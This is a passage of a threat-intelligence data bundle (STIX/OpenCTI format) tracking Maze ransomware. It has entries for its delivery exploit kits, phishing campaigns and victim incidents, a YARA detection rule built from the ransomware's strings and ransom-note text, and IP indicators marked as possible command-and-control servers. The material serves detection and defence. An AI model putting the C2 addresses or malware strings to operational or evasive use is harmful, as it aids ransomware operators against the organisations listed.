"relationship--4e67bf72-02fc-4f09-808c-550c6112f3f0",
"relationship--560ff6cf-b17e-4672-9e9f-64527f411396",
"relationship--2de7b0c0-65d2-4c33-ad51-6de4d96e8c82",
"relationship--a842a8f3-1a46-4c2f-86c6-0730f826123b",
"relationship--50550e47-fedd-4360-9e33-f76af5be17ac",
"relationship--df0e4c16-3729-4704-86d5-5aa4ae9f151a",
"relationship--2dcab7ee-67a3-4d56-9eb0-ccea4ca67591",
"relationship--553397d5-0d5c-4d77-a679-9013acf11eb1",
"relationship--7f190cdd-4c24-4197-8e19-de7a43cb4d69",
"relationship--5b0a8c1c-6265-42f3-84f0-e486dc3af97c",
"relationship--01ec830f-d69f-4ec7-8b31-df27320c60ca",
"relationship--5bb1db7e-66f7-4edc-bb45-f862d47299a3",
"relationship--6239433a-7b9a-478f-9e4e-4c7ced862958",
"relationship--508b19b9-30a8-44ac-b2d5-b010fdd30dbd",
"relationship--bcfa95a6-9978-4477-95f4-666308e2f316",
"relationship--36de8086-e0b8-4857-959b-223a5e4d70ff",
"relationship--98657e57-423b-4d22-918f-f7e6c0bace20",
"relationship--f6457544-4232-492a-9900-fdc16e2120ba",
"relationship--40934950-668c-4222-af9d-86861a673d64",
"relationship--63e10ccf-fcc5-420a-85e3-0ba606e424df",
"relationship--c3b77fd7-ca97-49cd-a456-55a84e5dbfb0",
"relationship--dee7e50e-824d-454a-93e2-034aa7234977",
"relationship--163d2fe5-2f5d-4b90-9c8e-2938d27e6ed8",
"relationship--fe3b22f8-caf6-4297-addd-8ead11501140",
"relationship--00d6f9a5-ba28-4c36-aa96-6a895c0f59d3",
"relationship--f194dfc2-1bb0-4aab-9200-87071915f98e",
"relationship--a79bd633-8557-4c5b-8381-24ea5795b0d1",
"relationship--a79dd61a-17db-4744-92d3-04f51f2d0337",
"relationship--3ccd9fb3-48d9-47b8-bb1d-f3abff658a7d",
"relationship--d8e74e08-bb66-4fd5-b3cd-5c79c397bf0d",
"relationship--75f5674b-2500-475a-aa55-6f77fa6ab9f7",
"relationship--c093a59f-7770-4ab1-8ea9-d2a1b6d8494f",
"relationship--d345dfdc-78d4-4473-b960-246c87a2698b",
"relationship--33e0e467-ed31-42f7-8939-1b07cd379eef",
"relationship--6823218c-aa3c-4d09-965f-17725774d37b",
"relationship--3fc721da-63c0-4366-b3fb-44fca7aa4e59",
"relationship--10f038ce-870a-4203-a972-661a383cbd06",
"relationship--0d4b8802-e9ab-4a81-9b4f-6893e8c72165",
"relationship--f86b3029-477d-456c-b69e-7f957e9a0ecc",
"relationship--f830e01a-1d45-42fc-86bc-49bde9def60b",
"relationship--e6676409-e7ad-4100-91df-175868b93131",
"relationship--c424d6d1-2338-4ce5-bf3b-e3c15494eb23",
"relationship--7b58b77e-b69d-462e-8a48-a37403ab6e66",
"relationship--35bb7efc-ff99-4ae2-8edf-609306dcdd38",
"relationship--384e4106-3db3-441f-aa4b-36205f49d2c8",
"relationship--8660671e-4e14-42a9-9582-c9b933e40367",
"relationship--4900c69b-95cb-4eac-a012-aa0cc971d523",
"relationship--335444b8-a1df-4cb1-a1ce-f15377655a8a",
"relationship--0a1f226a-697d-4625-a2e9-a540d5a93243",
"relationship--dcd2b964-691c-4d25-ae7b-602bd3bfb10d",
"relationship--db73ac7d-4992-4e24-a7dc-b8ca7e6a1dfa",
"relationship--7a40d101-a198-4ad0-8e28-7b1964e2a58e",
"relationship--7e86b9d0-9584-435f-98f7-3a59cedb3f81",
"relationship--ca24ea86-2325-469b-9031-a56075c124ac",
"relationship--c4512510-c528-42ae-9345-438f0fd04e6d",
"relationship--9a581b08-5371-4d0c-8ca1-a933c60b2030",
"relationship--eb7acec0-1510-479e-abca-00056fd56e83",
"relationship--c0e4a44a-3b9f-4560-905a-636f2f6a8070",
"relationship--f33f5d02-6467-49e0-9b10-95c55ef106b1",
"relationship--d214bad4-8ae3-490b-83d9-00a8d0f6c7a1",
"relationship--5400ff3b-0487-4455-a772-9097ae7751c3",
"relationship--d0ab3ef9-3303-4e00-b050-2a1fad8fdf53",
"relationship--907cfddb-6c6e-4eb1-8c56-1596c1ecf9bc",
"relationship--6cb972c9-84c3-4a01-8814-9ce23e386bc6",
"relationship--217bfd74-4f42-483a-8e63-bb86f7566eed",
"relationship--fa57e1ab-092d-44a4-90a4-bea3641bd96e",
"relationship--f805adbe-2c0b-4c13-a375-562b7ba8b625",
"relationship--7de932be-bdd3-4c2a-8fa3-239e6a1b43dc",
"relationship--5ccd07e8-781d-43c0-8448-0d6a18617554",
"relationship--8685ab4e-e44b-42f8-9f0a-0ce0b69ca115",
"relationship--f43ffd59-c8c6-4271-a322-c78ffb83555b",
"relationship--6227f6bc-1caf-47fb-8c66-21135550ed76",
"relationship--87236979-65e4-445e-bd16-186f2081bc2c",
"relationship--dd384fe8-e2f4-49c8-a0f5-f56571f4413d",
"relationship--bfc58ac1-0388-483b-b9c7-6c3695adfc0e",
"relationship--dff57daf-f597-4a66-a9bb-ad6487f1bb66",
"relationship--4332e775-2fbf-4c61-9513-a24d554d6099",
"relationship--ec3deac6-a9df-4987-947c-b6ec35871d3e",
"relationship--2c3bb531-75e8-4337-9f21-e181956ed8ca",
"relationship--cd3b1416-3550-4c03-84c9-deeebe1bf6e3",
"relationship--4b5067b7-c297-4ad7-a4c4-5ddeab47996d",
"relationship--927f8898-69f6-4815-a389-b92be0920466",
"relationship--b26692b6-492a-4975-a48c-0532813f3bd7",
"relationship--aac9bb6c-e142-4caf-a1a3-67c627bbc04a",
"relationship--16d0e325-54d2-485d-86b0-0b041661ec95",
"relationship--0838f4ff-c6ed-4aac-9401-4dfb3bfc7bc6",
"relationship--7278efc9-d16f-4f1e-9902-c44eac1ddfc6",
"relationship--58a80e8b-9ae2-4c52-80dd-85d77ceaa1df",
"relationship--7b15dda1-f16b-4853-b09c-82929f243c0f",
"relationship--704cfd8c-f9b9-41a7-9816-4fa48a222fef",
"relationship--023e9621-78d7-48ac-a9aa-fe54b55b1271",
"relationship--528c12c0-42ae-4c68-bbd5-733b34510517",
"relationship--93d3d709-0d95-4465-834b-4704ad1665f8",
"relationship--ef64aac0-ae6b-4660-b7f9-44d8ceb81c1c",
"relationship--7ae37c11-aa56-4155-99c6-72e0aecff7ea",
"relationship--958d972f-186c-4bc0-b1b4-453c0d4dc8b1",
"relationship--22bc2200-846f-4552-ad7f-8993489eabfe",
"relationship--e834fc63-5daf-468e-bf2d-4cfc1c15c745",
"relationship--33e2068b-067d-480c-be0e-4f2e71645f85",
"relationship--4819490a-9414-4b8d-8208-87dc2a33f584",
"relationship--14e23cd7-1a6d-422e-b1a6-61cb53e01215"
]
},
{
"id": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"type": "malware",
"name": "Beacon",
"labels": [
"malware"
],
"description": "Backdoor that is commercially available as part of the\nCobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.",
"created": "2019-09-30T16:38:26.000Z",
"modified": "2020-01-14T14:01:48.288Z",
"x_opencti_id": "14db3816-53db-4811-ba6e-586426ae59b8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"type": "malware",
"name": "Spelevo EK",
"labels": [
"malware"
],
"description": "Exploit Kit",
"created": "2020-02-04T14:48:31.601Z",
"modified": "2020-02-04T14:48:31.601Z",
"x_opencti_id": "6fb84f02-f095-430e-87a0-394d41955eee",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"type": "malware",
"name": "Fallout EK",
"labels": [
"malware"
],
"description": "Famous Exploit Kit.",
"created": "2019-09-12T10:09:57.000Z",
"modified": "2019-09-12T10:09:57.000Z",
"x_opencti_id": "947af535-64e2-4c0d-8b60-980d2633c014"
},
{
"id": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"type": "campaign",
"name": "Germany - Maze - October 2019",
"labels": [
"campaign"
],
"description": "Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures impersonating the\nBundeszentralamt fur Steuern, the German Federal Ministry of Finance. Of particular note is the use of stolen branding as well as the use of lookalike .icu domains used for the sender email address in order to craft effective lures.",
"created": "2020-01-07T14:25:02.649Z",
"modified": "2020-01-07T14:26:58.737Z",
"x_opencti_id": "867d03f4-be73-44f6-82d9-7d7b14df55d7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"type": "campaign",
"name": "Germany - Maze - November 2019",
"labels": [
"campaign"
],
"description": "On November 6, 2019, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures, again impersonating the German Federal Ministry of Finance. As with the previous two campaigns, the actor used stolen branding as well as the use of lookalike .icu\ndomains used for the sender email address in order to craft effective lures. The malicious document purports to be an RSA SecurID key used by the German Ministry of Finance.\n\nOn November 7, 2019, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures, this time impersonating a German internet service provider, 1&1 Internet AG.",
"created": "2020-01-07T14:38:20.950Z",
"modified": "2020-01-07T14:40:47.449Z",
"x_opencti_id": "835859b1-0bb9-4ec5-b7d7-c37f28747a0b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--82f427aa-7622-438f-9172-980fe432359c",
"type": "x-opencti-incident",
"name": "Incident Maze - Allied Universal",
"labels": [
"x-opencti-incident"
],
"description": "the group behind Maze Ransomware has published almost 700 MB worth of data and files stolen from security staffing firm Allied Universal.\nRansom amount asked : $2.3M",
"created": "2020-02-04T15:10:06.889Z",
"modified": "2020-02-04T15:10:06.889Z",
"x_opencti_id": "b268e4f0-e820-49c7-b441-015c543db252",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--4707c654-4876-4897-9a3a-eae84858e199",
"type": "x-opencti-incident",
"name": "Incident Maze - Southwire",
"labels": [
"x-opencti-incident"
],
"description": "Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, was attacked in December 2019. As part of this attack, the ransomware allegedly stole 120GB of data and encrypted 878 devices.\nAfter a ransom of 850 bitcoins, or $6 million. was not paid by Southwire, the Maze operators published a portion of their stolen data on a \"news\" site that the threat actors created.",
"created": "2020-01-08T16:03:47.168Z",
"modified": "2020-01-08T16:03:47.168Z",
"x_opencti_id": "ff44ba3e-2409-42b9-b523-24a70e1176ae",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"type": "x-opencti-incident",
"name": "Incident Maze - City of Pensacola",
"labels": [
"x-opencti-incident"
],
"description": "The City of Pensacola was hit in december 2019 with a Maze ransomware attack that impacted the city's email service, some phone service, and caused them to shut down their computer systems.\nThreat actors demanded a $1 million ransom and released the 23rd december 2gb of files that they state they stole from the city before encrypting the network.",
"created": "2020-01-08T16:00:35.328Z",
"modified": "2020-01-08T16:00:35.328Z",
"x_opencti_id": "09c0f17d-4276-4a24-9b32-acf777ba6af4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"type": "campaign",
"name": "Italy - Maze - October 2019",
"labels": [
"campaign"
],
"description": "On October 29, Proofpoint researchers observed dozens of emails\nattempting to deliver malicious Microsoft Word attachments with\nItalian lures impersonating the Agenzia Entrate, the Italian Ministry\nof Taxation. As with the initially observed German campaign, the\nactor has used stolen branding as well as lookalike.icu domains\nused for the sender email address in order to craft effective lures.",
"created": "2020-01-07T14:34:49.221Z",
"modified": "2020-01-07T14:34:49.221Z",
"x_opencti_id": "b0ac41fa-ef97-462e-a90a-74e97b8be36b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"type": "x-opencti-incident",
"name": "Incident Maze - Fratelli Beretta",
"labels": [
"x-opencti-incident"
],
"description": "The Italian foods company Fratelli Beretta saw all the data exfiltrated from 53 systems (a total of 3GB) posted online by Maze in december 2019.",
"created": "2020-02-04T15:24:17.831Z",
"modified": "2020-02-04T15:25:13.215Z",
"x_opencti_id": "b57e5c0d-0b3e-41d9-8155-b045736f47f4",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"type": "x-opencti-incident",
"name": "Incident Maze - Stockdale radiology",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : Stockdale Radiology is one of the medical entities Maze Team had informed me about previously and had sent me a sample of patient files from.",
"created": "2020-02-04T15:30:14.480Z",
"modified": "2020-02-04T15:30:14.480Z",
"x_opencti_id": "dd843665-374a-4f2c-a2fc-70f850a2fc95",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"type": "x-opencti-incident",
"name": "Incident Maze - Lakeland Community College",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : Lakeland Community College in Ohio also became a victim,\nit seems. Their data were reportedly locked on January 12 and 19 GB of data were allegedly downloaded. There is no notice on the college\u2019s site as of today, and the proof file is not linked to a working file.",
"created": "2020-02-04T15:37:05.236Z",
"modified": "2020-02-04T15:37:05.236Z",
"x_opencti_id": "fab78d2b-3759-4c12-940b-7814aa78aec7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"type": "x-opencti-incident",
"name": "Incident Maze - Medical Diagnostic Laboratories",
"labels": [
"x-opencti-incident"
],
"description": "databreaches : Medical Diagnostic Laboratories, LLC (MDL or MDLab) had already had some of their data dumped by Maze Team. They now appear to have had more of their files dumped. There is no announcement or notice on their website that might inform patients of any problem or data theft and there is no notice from the listed on HHS\u2019s public breach tool at this time.",
"created": "2020-02-04T15:42:17.018Z",
"modified": "2020-02-04T15:44:22.169Z",
"x_opencti_id": "f9abec3e-0531-4be4-a91e-f2ff6fd9c26b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"type": "campaign",
"name": "US - Maze - November 2019",
"labels": [
"campaign"
],
"description": "On November 12, 2019, Proofpoint researchers observed thousands of emails attempting to deliver malicious Microsoft Word attachments with English lures, this time impersonating the United States Postal Service (USPS) and distributing the IcedID banking Trojan.",
"created": "2020-01-07T14:46:13.671Z",
"modified": "2020-01-07T14:46:13.671Z",
"x_opencti_id": "a70839c5-e68b-4d03-bd51-916e42ac9e79",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"type": "x-opencti-incident",
"name": "Incident Maze - Hamilton and Naumes",
"labels": [
"x-opencti-incident"
],
"description": "Databreaches : They have also attacked a law firm in Oregon: Hamilton and Naumes, LLC. That attack took place on January 16, and there are no proof files uploaded as of today\u2019s date, but if they were able to get everything, then there may well be a lot of sensitive files as the firm\u2019s areas of practice include family law, juvenile law, and criminal defense.",
"created": "2020-02-04T15:46:27.942Z",
"modified": "2020-02-04T15:46:27.942Z",
"x_opencti_id": "8c9ae84e-6f6a-4414-aca0-7159260e359f"
},
{
"id": "incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"type": "x-opencti-incident",
"name": "Incident Maze - Bird Construction",
"labels": [
"x-opencti-incident"
],
"description": "General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company.",
"created": "2020-02-04T15:52:16.845Z",
"modified": "2020-02-04T15:52:16.845Z",
"x_opencti_id": "725af09e-714a-45a8-8c38-9aec63b7c3f3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"type": "campaign",
"name": "Campaign - Maze - pre-october 2019",
"labels": [
"campaign"
],
"description": "Maze was known to be delivered by exploit kit (Fallout and Spelevo).",
"created": "2020-02-04T14:47:29.010Z",
"modified": "2020-02-04T14:47:29.010Z",
"x_opencti_id": "a0ab295e-7da9-4eb1-8b77-10a956895038",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"type": "x-opencti-incident",
"name": "Incident Maze - Bouygues Construction",
"labels": [
"x-opencti-incident"
],
"description": "Bouygues Construction has been compromised by Maze ransomware the 30th january 2020. Threat Actor asked for 10 millions dollars for decryption and leaked a list of computers exposed on Internet.",
"created": "2020-02-04T14:26:38.377Z",
"modified": "2020-02-04T14:32:50.335Z",
"x_opencti_id": "d43a1099-26bf-4fa0-ac36-3a22271c4284",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"type": "x-opencti-incident",
"name": "Incident Maze - Andrew Agencies",
"labels": [
"x-opencti-incident"
],
"description": "Maze Threat Actor claimed Andrew Agencies was attacked on October 21st, 2019 when they breached their network and encrypted 245 computers.",
"created": "2020-02-04T15:04:05.991Z",
"modified": "2020-02-04T15:04:05.991Z",
"x_opencti_id": "95ecd5fe-d3bc-4f8d-90c9-ddc077ab38c6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"type": "indicator",
"name": "Maze rule",
"labels": [
"indicator"
],
"pattern": "rule Maze\n{\nmeta:\n\tdescription = \"Identifies Maze ransomware in memory or unpacked.\"\n\tauthor = \"@bartblaze\"\n\tdate = \"2019-11\"\n\ttlp = \"White\"\n\nstrings:\t\n\t$ = \"Enc: %s\" ascii wide\n\t$ = \"Encrypting whole system\" ascii wide\n\t$ = \"Encrypting specified folder in --path parameter...\" ascii wide\n\t$ = \"!Finished in %d ms!\" ascii wide\n\t$ = \"--logging\" ascii wide\n\t$ = \"--nomutex\" ascii wide\n\t$ = \"--noshares\" ascii wide\n\t$ = \"--path\" ascii wide\n\t$ = \"Logging enabled | Maze\" ascii wide\n\t$ = \"NO SHARES | \" ascii wide\n\t$ = \"NO MUTEX | \" ascii wide\n\t$ = \"Encrypting:\" ascii wide\n\t$ = \"You need to buy decryptor in order to restore the files.\" ascii wide\n\t$ = \"Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms\" ascii wide\n\t$ = \"%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s\" ascii wide\n\t$ = \"DECRYPT-FILES.txt\" ascii wide fullword\n\ncondition:\n\t5 of them\n}",
"valid_from": "2020-02-05T09:12:00.000Z",
"valid_until": "2021-02-04T09:12:00.000Z",
"x_opencti_pattern_type": "yara",
"created": "2020-02-05T09:18:39.097Z",
"modified": "2020-02-05T09:18:39.097Z",
"x_opencti_id": "882eece0-0a2d-4308-af27-3b50dc794131"
},
{
"id": "indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"type": "indicator",
"name": "104.168.198.230",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.198.230']",
"valid_from": "2020-02-05T10:00:22.262Z",
"valid_until": "2021-02-04T10:00:22.262Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:23.146Z",
"modified": "2020-02-05T10:00:23.146Z",
"x_opencti_id": "5c71fd50-3989-4a2b-8c2b-a25515adbfa3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"type": "indicator",
"name": "104.168.198.208",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.198.208']",
"valid_from": "2020-02-05T10:00:19.903Z",
"valid_until": "2021-02-04T10:00:19.903Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:20.802Z",
"modified": "2020-02-05T10:00:20.802Z",
"x_opencti_id": "9f32bb2e-0f75-47d9-88d4-1923e538b9e4",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"type": "indicator",
"name": "104.168.174.32",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.174.32']",
"valid_from": "2020-02-05T09:59:22.234Z",
"valid_until": "2021-02-04T09:59:22.234Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T09:59:23.216Z",
"modified": "2020-02-05T09:59:23.216Z",
"x_opencti_id": "f2f46567-5d11-4af4-851f-81aa2a0f9073",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"type": "indicator",
"name": "104.168.215.54",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '104.168.215.54']",
"valid_from": "2020-02-05T10:00:24.565Z",
"valid_until": "2021-02-04T10:00:24.565Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:00:25.512Z",
"modified": "2020-02-05T10:00:25.512Z",
"x_opencti_id": "d23c7c16-70d4-40e6-a652-9df274007131",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"type": "indicator",
"name": "108.174.199.10",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '108.174.199.10']",
"valid_from": "2020-02-05T10:04:46.484Z",
"valid_until": "2021-02-04T10:04:46.484Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:47.374Z",
"modified": "2020-02-05T10:04:47.374Z",
"x_opencti_id": "e0488d1d-a872-4a82-9f14-d408ec468774",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"type": "indicator",
"name": "185.147.15.22",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '185.147.15.22']",
"valid_from": "2020-02-05T10:04:49.238Z",
"valid_until": "2021-02-04T10:04:49.238Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:50.122Z",
"modified": "2020-02-05T10:04:50.122Z",
"x_opencti_id": "f669ccd2-d5f8-4544-a8a3-b09845e73768",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"type": "indicator",
"name": "192.119.106.135",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.119.106.135']",
"valid_from": "2020-02-05T10:04:51.926Z",
"valid_until": "2021-02-04T10:04:51.926Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:52.855Z",
"modified": "2020-02-05T10:04:52.855Z",
"x_opencti_id": "ea0bd5e6-0dd3-4582-ab6b-81bf69923bd3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"type": "indicator",
"name": "192.119.68.225",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.119.68.225']",
"valid_from": "2020-02-05T10:04:54.826Z",
"valid_until": "2021-02-04T10:04:54.826Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:55.765Z",
"modified": "2020-02-05T10:04:55.765Z",
"x_opencti_id": "4013a3c4-2f41-4879-a889-adfa2226294b",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"type": "indicator",
"name": "192.236.210.142",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '192.236.210.142']",
"valid_from": "2020-02-05T10:04:57.665Z",
"valid_until": "2021-02-04T10:04:57.665Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:04:58.693Z",
"modified": "2020-02-05T10:04:58.693Z",
"x_opencti_id": "c02b5af3-6cd4-4920-892e-d9217e7ad432",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"type": "indicator",
"name": "198.50.168.67",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '198.50.168.67']",
"valid_from": "2020-02-05T10:05:00.709Z",
"valid_until": "2021-02-04T10:05:00.709Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:01.628Z",
"modified": "2020-02-05T10:05:01.628Z",
"x_opencti_id": "14b23d2a-1cf9-4220-80ac-0a0eac87d2ac",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--6e479260-bd34-45c4-802f-a236533127f0",
"type": "indicator",
"name": "5.199.167.188",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '5.199.167.188']",
"valid_from": "2020-02-05T10:05:03.825Z",
"valid_until": "2021-02-04T10:05:03.825Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:04.888Z",
"modified": "2020-02-05T10:05:04.888Z",
"x_opencti_id": "eff25a89-e31d-4e7e-b3e2-4333a2928305",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"type": "indicator",
"name": "54.39.233.131",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '54.39.233.131']",
"valid_from": "2020-02-05T10:05:06.759Z",
"valid_until": "2021-02-04T10:05:06.759Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:07.831Z",
"modified": "2020-02-05T10:05:07.831Z",
"x_opencti_id": "595a9e9c-ad80-4f78-b441-f34585aa9464",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"type": "indicator",
"name": "54.39.233.175",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '54.39.233.175']",
"valid_from": "2020-02-05T10:05:09.874Z",
"valid_until": "2021-02-04T10:05:09.874Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:10.825Z",
"modified": "2020-02-05T10:05:10.825Z",
"x_opencti_id": "40dc5b4b-1530-4d79-a7b5-0a7b670487e3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"type": "indicator",
"name": "91.218.114.11",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '91.218.114.11']",
"valid_from": "2020-02-05T10:05:12.637Z",
"valid_until": "2021-02-04T10:05:12.637Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:13.537Z",
"modified": "2020-02-05T10:05:13.537Z",
"x_opencti_id": "017ccfd2-0c45-4545-b8c5-297a572a6477",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
